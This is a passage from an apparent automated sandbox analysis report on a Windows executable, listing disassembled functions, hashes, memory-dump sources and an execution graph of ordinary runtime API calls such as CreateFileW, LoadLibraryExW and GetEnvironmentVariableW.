                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                      • Instruction ID: ea22a9ceabe4f21caf947149c83ca4085102e6e9c6bc832b16de07e8bfdef316
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A11E521F0C5C282FB54A76AE5442F99A92FB88780FD88230DB7907BD9CD7DD5D1C2A0
                                                                                                                                                                                                      Function 00007FF7FF5A5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                                                      • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                      • Instruction ID: d01e687f5c737a1716513eb621d5cf813aec06a6f1a0f07a87aa6a2680b5a6bf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8412822A092C242FB24AB25A451BB9E650EB92FA4F944335EE7C07AD9DF3CD451C750
                                                                                                                                                                                                      Function 00007FF7FF599084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5990B6
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7FF58CC15), ref: 00007FF7FF5990D4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                      • API String ID: 3580290477-2366978088
                                                                                                                                                                                                      • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                      • Instruction ID: 116025176c9ba06b75a6b1c5997c503702ba13ee47ba7defce06554ddc0d27b7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E417132A0879285EB28BF2594800FDA7A4FB457D0BD54235E97E43BC5DE3CE48283E0
                                                                                                                                                                                                      Function 00007FF7FF59CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                                                      • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                      • Instruction ID: 4350fd86aabc0073b0910ea94eab0ec3ec10ade74b9cb836cc04849bbc619faf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8441A472B19BC685DB609F25E4443E9A760FB88794F845231EE6D87B98EF3CD401C790
                                                                                                                                                                                                      Function 00007FF7FF59F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                                                      • Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                      • Instruction ID: 9fc44e8121d8efa71f70279b571c035e06d98e4d0367eb3b9010fceeea1011ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C21C362A082C182EB38AB15D0442ADB3F5FB84B84FD54235D6BD436D4DF7CD9558BA0
                                                                                                                                                                                                      Function 00007FF7FF58FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                      • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                      • Instruction ID: 62b1d1f84e2720f0c2b144e6d6778a27936c91cc0b47464ab0b2b22f3f879139
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09115132609B8182EB609F15F400299B7E0FB88B84F584231DBAD077A9DF3CC561C740
                                                                                                                                                                                                      Function 00007FF7FF5A07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                                                      • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                      • Instruction ID: 51002d20dc399fcf7225d531e7aa008d07496236daae5ad4f3dea19c87a1a16d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C501716291928386F734BF6094652BEA3A0EF44708FC40235D57D83BD1DE3CE514CAA4

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:3.4%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:648
                                                                                                                                                                                                      Total number of Limit Nodes:8
                                                                                                                                                                                                      execution_graph 29634 7ff7ff5999d1 29646 7ff7ff59a448 29634->29646 29636 7ff7ff5999d6 29637 7ff7ff599a47 29636->29637 29638 7ff7ff5999fd GetModuleHandleW 29636->29638 29639 7ff7ff5998d4 11 API calls 29637->29639 29638->29637 29644 7ff7ff599a0a 29638->29644 29640 7ff7ff599a83 29639->29640 29641 7ff7ff599a8a 29640->29641 29642 7ff7ff599aa0 11 API calls 29640->29642 29643 7ff7ff599a9c 29642->29643 29644->29637 29645 7ff7ff599af8 GetModuleHandleExW GetProcAddress FreeLibrary 29644->29645 29645->29637 29651 7ff7ff59b1c0 45 API calls 3 library calls 29646->29651 29649 7ff7ff59a451 29652 7ff7ff59a574 45 API calls 2 library calls 29649->29652 29651->29649 29653 7ff7ff595698 29654 7ff7ff5956cf 29653->29654 29655 7ff7ff5956b2 29653->29655 29654->29655 29656 7ff7ff5956e2 CreateFileW 29654->29656 29678 7ff7ff594f58 11 API calls memcpy_s 29655->29678 29658 7ff7ff595716 29656->29658 29659 7ff7ff59574c 29656->29659 29681 7ff7ff5957ec 59 API calls 3 library calls 29658->29681 29682 7ff7ff595c74 46 API calls 3 library calls 29659->29682 29660 7ff7ff5956b7 29679 7ff7ff594f78 11 API calls memcpy_s 29660->29679 29664 7ff7ff595724 29667 7ff7ff595741 CloseHandle 29664->29667 29668 7ff7ff59572b CloseHandle 29664->29668 29665 7ff7ff595751 29669 7ff7ff595780 29665->29669 29670 7ff7ff595755 29665->29670 29666 7ff7ff5956bf 29680 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 29666->29680 29673 7ff7ff5956ca 29667->29673 29668->29673 29684 7ff7ff595a34 51 API calls 29669->29684 29683 7ff7ff594eec 11 API calls 2 library calls 29670->29683 29675 7ff7ff59578d 29685 7ff7ff595b70 21 API calls _fread_nolock 29675->29685 29677 7ff7ff59575f 29677->29673 29678->29660 29679->29666 29680->29673 29681->29664 29682->29665 29683->29677 29684->29675 29685->29677 29686 7ff7ff58ccac 29707 7ff7ff58ce7c 29686->29707 29689 7ff7ff58cdf8 29856 7ff7ff58d19c 7 API calls 2 library calls 29689->29856 29690 7ff7ff58ccc8 __scrt_acquire_startup_lock 29692 7ff7ff58ce02 29690->29692 29699 7ff7ff58cce6 __scrt_release_startup_lock 29690->29699 29857 7ff7ff58d19c 7 API calls 2 library calls 29692->29857 29694 7ff7ff58cd0b 29695 7ff7ff58ce0d __GetCurrentState 29696 7ff7ff58cd91 29713 7ff7ff58d2e4 29696->29713 29698 7ff7ff58cd96 29716 7ff7ff581000 29698->29716 29699->29694 29699->29696 29853 7ff7ff599b9c 45 API calls 29699->29853 29704 7ff7ff58cdb9 29704->29695 29855 7ff7ff58d000 7 API calls 29704->29855 29706 7ff7ff58cdd0 29706->29694 29708 7ff7ff58ce84 29707->29708 29709 7ff7ff58ce90 __scrt_dllmain_crt_thread_attach 29708->29709 29710 7ff7ff58ccc0 29709->29710 29711 7ff7ff58ce9d 29709->29711 29710->29689 29710->29690 29711->29710 29858 7ff7ff58d8f8 7 API calls 2 library calls 29711->29858 29859 7ff7ff5aa540 29713->29859 29717 7ff7ff581009 29716->29717 29861 7ff7ff5954f4 29717->29861 29719 7ff7ff5837fb 29868 7ff7ff5836b0 29719->29868 29725 7ff7ff58383c 29971 7ff7ff581c80 29725->29971 29726 7ff7ff58391b 29976 7ff7ff5845b0 29726->29976 29730 7ff7ff58385b 29940 7ff7ff588a20 29730->29940 29732 7ff7ff58396a 29999 7ff7ff582710 54 API calls _log10_special 29732->29999 29736 7ff7ff58388e 29743 7ff7ff5838bb __std_exception_copy 29736->29743 29975 7ff7ff588b90 40 API calls __std_exception_copy 29736->29975 29737 7ff7ff58395d 29738 7ff7ff583984 29737->29738 29739 7ff7ff583962 29737->29739 29741 7ff7ff581c80 49 API calls 29738->29741 29995 7ff7ff5900bc 29739->29995 29744 7ff7ff5839a3 29741->29744 29745 7ff7ff588a20 14 API calls 29743->29745 29752 7ff7ff5838de __std_exception_copy 29743->29752 29749 7ff7ff581950 115 API calls 29744->29749 29745->29752 29747 7ff7ff583a0b 30002 7ff7ff588b90 40 API calls __std_exception_copy 29747->30002 29751 7ff7ff5839ce 29749->29751 29750 7ff7ff583a17 30003 7ff7ff588b90 40 API calls __std_exception_copy 29750->30003 29751->29730 29754 7ff7ff5839de 29751->29754 29758 7ff7ff58390e __std_exception_copy 29752->29758 30001 7ff7ff588b30 40 API calls __std_exception_copy 29752->30001 30000 7ff7ff582710 54 API calls _log10_special 29754->30000 29756 7ff7ff583a23 30004 7ff7ff588b90 40 API calls __std_exception_copy 29756->30004 29759 7ff7ff588a20 14 API calls 29758->29759 29760 7ff7ff583a3b 29759->29760 29761 7ff7ff583b2f 29760->29761 29762 7ff7ff583a60 __std_exception_copy 29760->29762 30006 7ff7ff582710 54 API calls _log10_special 29761->30006 29773 7ff7ff583aab 29762->29773 30005 7ff7ff588b30 40 API calls __std_exception_copy 29762->30005 29764 7ff7ff583808 __std_exception_copy 30009 7ff7ff58c5c0 29764->30009 29766 7ff7ff588a20 14 API calls 29767 7ff7ff583bf4 __std_exception_copy 29766->29767 29768 7ff7ff583c46 29767->29768 29769 7ff7ff583d41 29767->29769 29770 7ff7ff583cd4 29768->29770 29771 7ff7ff583c50 29768->29771 30020 7ff7ff5844d0 49 API calls 29769->30020 29775 7ff7ff588a20 14 API calls 29770->29775 30007 7ff7ff5890e0 59 API calls _log10_special 29771->30007 29773->29766 29778 7ff7ff583ce0 29775->29778 29776 7ff7ff583d4f 29779 7ff7ff583d65 29776->29779 29780 7ff7ff583d71 29776->29780 29777 7ff7ff583c55 29781 7ff7ff583cb3 29777->29781 29782 7ff7ff583c61 29777->29782 29778->29782 29786 7ff7ff583ced 29778->29786 30021 7ff7ff584620 29779->30021 29784 7ff7ff581c80 49 API calls 29780->29784 30018 7ff7ff588850 86 API calls 2 library calls 29781->30018 30008 7ff7ff582710 54 API calls _log10_special 29782->30008 29797 7ff7ff583d2b __std_exception_copy 29784->29797 29789 7ff7ff581c80 49 API calls 29786->29789 29787 7ff7ff583cbb 29792 7ff7ff583cc8 29787->29792 29793 7ff7ff583cbf 29787->29793 29794 7ff7ff583d0b 29789->29794 29790 7ff7ff583dc4 29953 7ff7ff589400 29790->29953 29792->29797 29793->29782 29794->29797 29798 7ff7ff583d12 29794->29798 29795 7ff7ff583da7 SetDllDirectoryW LoadLibraryExW 29795->29790 29796 7ff7ff583dd7 SetDllDirectoryW 29801 7ff7ff583e0a 29796->29801 29845 7ff7ff583e5a 29796->29845 29797->29790 29797->29795 30019 7ff7ff582710 54 API calls _log10_special 29798->30019 29803 7ff7ff588a20 14 API calls 29801->29803 29802 7ff7ff583ffc 29805 7ff7ff584029 29802->29805 29806 7ff7ff584006 PostMessageW GetMessageW 29802->29806 29811 7ff7ff583e16 __std_exception_copy 29803->29811 29804 7ff7ff583f1b 30032 7ff7ff5833c0 121 API calls 2 library calls 29804->30032 29958 7ff7ff583360 29805->29958 29806->29805 29808 7ff7ff583f23 29808->29764 29809 7ff7ff583f2b 29808->29809 30033 7ff7ff5890c0 LocalFree 29809->30033 29812 7ff7ff583ef2 29811->29812 29821 7ff7ff583e4e 29811->29821 30031 7ff7ff588b30 40 API calls __std_exception_copy 29812->30031 29821->29845 30024 7ff7ff586db0 54 API calls memcpy_s 29821->30024 29826 7ff7ff58404f 29827 7ff7ff583e6c 30025 7ff7ff587330 117 API calls 2 library calls 29827->30025 29831 7ff7ff583e81 29834 7ff7ff583ea2 29831->29834 29846 7ff7ff583e85 29831->29846 30026 7ff7ff586df0 120 API calls _log10_special 29831->30026 29834->29846 30027 7ff7ff5871a0 125 API calls 29834->30027 29838 7ff7ff583eb7 29838->29846 30028 7ff7ff5874e0 55 API calls 29838->30028 29840 7ff7ff583ee0 30030 7ff7ff586fb0 FreeLibrary 29840->30030 29845->29802 29845->29804 29846->29845 30029 7ff7ff582a50 54 API calls _log10_special 29846->30029 29853->29696 29854 7ff7ff58d328 GetModuleHandleW 29854->29704 29855->29706 29856->29692 29857->29695 29858->29710 29860 7ff7ff58d2fb GetStartupInfoW 29859->29860 29860->29698 29864 7ff7ff59f4f0 29861->29864 29862 7ff7ff59f543 30035 7ff7ff59a884 37 API calls 2 library calls 29862->30035 29864->29862 29865 7ff7ff59f596 29864->29865 30036 7ff7ff59f3c8 71 API calls _fread_nolock 29865->30036 29867 7ff7ff59f56c 29867->29719 30037 7ff7ff58c8c0 29868->30037 29871 7ff7ff5836eb GetLastError 30044 7ff7ff582c50 51 API calls _log10_special 29871->30044 29872 7ff7ff583710 30039 7ff7ff5892f0 FindFirstFileExW 29872->30039 29876 7ff7ff58377d 30047 7ff7ff5894b0 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 29876->30047 29877 7ff7ff583723 30045 7ff7ff589370 CreateFileW GetFinalPathNameByHandleW CloseHandle 29877->30045 29879 7ff7ff58c5c0 _log10_special 8 API calls 29882 7ff7ff5837b5 29879->29882 29881 7ff7ff583730 29883 7ff7ff58374c __vcrt_InitializeCriticalSectionEx 29881->29883 29884 7ff7ff583734 29881->29884 29882->29764 29890 7ff7ff581950 29882->29890 29883->29876 30046 7ff7ff582810 49 API calls _log10_special 29884->30046 29885 7ff7ff583706 29885->29879 29886 7ff7ff58378b 29886->29885 30048 7ff7ff582810 49 API calls _log10_special 29886->30048 29889 7ff7ff583745 29889->29885 29891 7ff7ff5845b0 108 API calls 29890->29891 29892 7ff7ff581985 29891->29892 29893 7ff7ff581c43 29892->29893 29895 7ff7ff587f80 83 API calls 29892->29895 29894 7ff7ff58c5c0 _log10_special 8 API calls 29893->29894 29896 7ff7ff581c5e 29894->29896 29897 7ff7ff5819cb 29895->29897 29896->29725 29896->29726 29939 7ff7ff581a03 29897->29939 30049 7ff7ff590744 29897->30049 29899 7ff7ff5900bc 74 API calls 29899->29893 29900 7ff7ff5819e5 29901 7ff7ff5819e9 29900->29901 29902 7ff7ff581a08 29900->29902 30056 7ff7ff594f78 11 API calls memcpy_s 29901->30056 30053 7ff7ff59040c 29902->30053 29905 7ff7ff5819ee 30057 7ff7ff582910 54 API calls _log10_special 29905->30057 29908 7ff7ff581a26 30058 7ff7ff594f78 11 API calls memcpy_s 29908->30058 29909 7ff7ff581a45 29912 7ff7ff581a5c 29909->29912 29913 7ff7ff581a7b 29909->29913 29911 7ff7ff581a2b 30059 7ff7ff582910 54 API calls _log10_special 29911->30059 30060 7ff7ff594f78 11 API calls memcpy_s 29912->30060 29916 7ff7ff581c80 49 API calls 29913->29916 29918 7ff7ff581a92 29916->29918 29917 7ff7ff581a61 30061 7ff7ff582910 54 API calls _log10_special 29917->30061 29920 7ff7ff581c80 49 API calls 29918->29920 29921 7ff7ff581add 29920->29921 29922 7ff7ff590744 73 API calls 29921->29922 29923 7ff7ff581b01 29922->29923 29924 7ff7ff581b16 29923->29924 29925 7ff7ff581b35 29923->29925 30062 7ff7ff594f78 11 API calls memcpy_s 29924->30062 29927 7ff7ff59040c _fread_nolock 53 API calls 29925->29927 29929 7ff7ff581b4a 29927->29929 29928 7ff7ff581b1b 30063 7ff7ff582910 54 API calls _log10_special 29928->30063 29931 7ff7ff581b50 29929->29931 29932 7ff7ff581b6f 29929->29932 30064 7ff7ff594f78 11 API calls memcpy_s 29931->30064 30066 7ff7ff590180 37 API calls 2 library calls 29932->30066 29935 7ff7ff581b89 29935->29939 30067 7ff7ff582710 54 API calls _log10_special 29935->30067 29936 7ff7ff581b55 30065 7ff7ff582910 54 API calls _log10_special 29936->30065 29939->29899 29941 7ff7ff588a2a 29940->29941 29942 7ff7ff589400 2 API calls 29941->29942 29943 7ff7ff588a49 GetEnvironmentVariableW 29942->29943 29944 7ff7ff588ab2 29943->29944 29945 7ff7ff588a66 ExpandEnvironmentStringsW 29943->29945 29947 7ff7ff58c5c0 _log10_special 8 API calls 29944->29947 29945->29944 29946 7ff7ff588a88 29945->29946 30097 7ff7ff5894b0 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 29946->30097 29949 7ff7ff588ac4 29947->29949 29949->29736 29950 7ff7ff588a9a 29951 7ff7ff58c5c0 _log10_special 8 API calls 29950->29951 29952 7ff7ff588aaa 29951->29952 29952->29736 29954 7ff7ff589422 MultiByteToWideChar 29953->29954 29956 7ff7ff589446 29953->29956 29954->29956 29957 7ff7ff58945c __std_exception_copy 29954->29957 29955 7ff7ff589463 MultiByteToWideChar 29955->29957 29956->29955 29956->29957 29957->29796 30098 7ff7ff586350 29958->30098 29962 7ff7ff583381 29966 7ff7ff583399 29962->29966 30166 7ff7ff586040 29962->30166 29964 7ff7ff58338d 29964->29966 30175 7ff7ff5861d0 54 API calls 29964->30175 29967 7ff7ff583670 29966->29967 29968 7ff7ff58367e 29967->29968 29969 7ff7ff58368f 29968->29969 30314 7ff7ff589050 FreeLibrary 29968->30314 30034 7ff7ff586fb0 FreeLibrary 29969->30034 29972 7ff7ff581ca5 29971->29972 30315 7ff7ff5949f4 29972->30315 29975->29743 29977 7ff7ff5845bc 29976->29977 29978 7ff7ff589400 2 API calls 29977->29978 29979 7ff7ff5845e4 29978->29979 29980 7ff7ff589400 2 API calls 29979->29980 29981 7ff7ff5845f7 29980->29981 30342 7ff7ff596004 29981->30342 29984 7ff7ff58c5c0 _log10_special 8 API calls 29985 7ff7ff58392b 29984->29985 29985->29732 29986 7ff7ff587f80 29985->29986 29987 7ff7ff587fa4 29986->29987 29988 7ff7ff590744 73 API calls 29987->29988 29993 7ff7ff58807b __std_exception_copy 29987->29993 29989 7ff7ff587fc0 29988->29989 29989->29993 30510 7ff7ff597938 29989->30510 29991 7ff7ff590744 73 API calls 29994 7ff7ff587fd5 29991->29994 29992 7ff7ff59040c _fread_nolock 53 API calls 29992->29994 29993->29737 29994->29991 29994->29992 29994->29993 29996 7ff7ff5900ec 29995->29996 30526 7ff7ff58fe98 29996->30526 29998 7ff7ff590105 29998->29732 29999->29764 30000->29764 30001->29747 30002->29750 30003->29756 30004->29758 30005->29773 30006->29764 30007->29777 30008->29764 30010 7ff7ff58c5c9 30009->30010 30011 7ff7ff583ca7 30010->30011 30012 7ff7ff58c950 IsProcessorFeaturePresent 30010->30012 30011->29854 30013 7ff7ff58c968 30012->30013 30538 7ff7ff58cb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 30013->30538 30015 7ff7ff58c97b 30539 7ff7ff58c910 SetUnhandledExceptionFilter UnhandledExceptionFilter 